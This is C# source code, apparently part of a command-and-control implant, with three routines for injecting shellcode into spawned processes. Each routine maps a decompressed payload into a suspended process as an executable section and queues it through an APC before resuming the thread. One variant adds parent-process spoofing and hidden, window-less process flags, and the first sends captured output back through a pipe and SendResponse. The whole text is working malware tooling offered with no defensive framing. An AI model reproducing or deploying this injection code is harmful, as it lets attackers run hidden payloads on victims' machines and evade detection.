public void ExecuteModuleUnManaged()
{
string output = "";
IntPtr hReadPipe = IntPtr.Zero;
IntPtr hWritePipe = IntPtr.Zero;
if (!Spawner.CreatePipe(ref hReadPipe, ref hWritePipe))
{
return;
}
Core.Natives.PROCESS_INFORMATION procInfo = new Core.Natives.PROCESS_INFORMATION();
if (!Spawner.CreateProcess(hReadPipe, hWritePipe, this.processname, true, ref procInfo))
{
return;
}
string pipename = GetPipeName(procInfo.dwProcessId);
InjectionLoaderListener injectionLoaderListener = new InjectionLoaderListener(pipename, task);
byte[] payload = Core.Utility.DecompressDLL(Convert.FromBase64String(worker.nutclr));
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size, Core.Natives.PAGE_EXECUTE_READWRITE);
if (section == IntPtr.Zero)
{
return;
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Core.Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Core.Natives.PAGE_READWRITE);
if (baseAddr == IntPtr.Zero)
{
return;
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Core.Natives.PAGE_EXECUTE);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return;
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return;
}
// Assign address of shellcode to the target thread apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return;
}
IntPtr infoth = InjectionHelper.SetInformationThread(procInfo);
if (infoth == IntPtr.Zero)
{
return;
}
InjectionHelper.ResumeThread(procInfo);
output = injectionLoaderListener.Execute(procInfo.hProcess, hReadPipe);
Core.Natives.CloseHandle(procInfo.hThread);
Core.Natives.CloseHandle(procInfo.hProcess);
SendResponse(output);
}
public static bool SapwnAndInject(string binary, byte[] payload)
{
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
if (!Spawner.CreateProcess(binary, true, ref procInfo))
{
return(false);
}
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
// Assign address of shellcode to the target thread apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return(false);
}
InjectionHelper.SetInformationThread(procInfo);
InjectionHelper.ResumeThread(procInfo);
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
return(true);
}
public static bool SapwnAndInjectPPID(string binary, byte[] payload, int ppid)
{
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
Natives.CreationFlags flags = Natives.CreationFlags.CREATE_SUSPENDED | Natives.CreationFlags.DETACHED_PROCESS
| Natives.CreationFlags.CREATE_NO_WINDOW | Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT;
if (!Spawner.CreateProcess(binary, ppid, flags, ref procInfo))
{
return(false);
}
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
// Assign address of shellcode to the target thread apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return(false);
}
IntPtr infoth = InjectionHelper.SetInformationThread(procInfo);
if (infoth == IntPtr.Zero)
{
return(false);
}
InjectionHelper.ResumeThread(procInfo);
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
return(true);
}
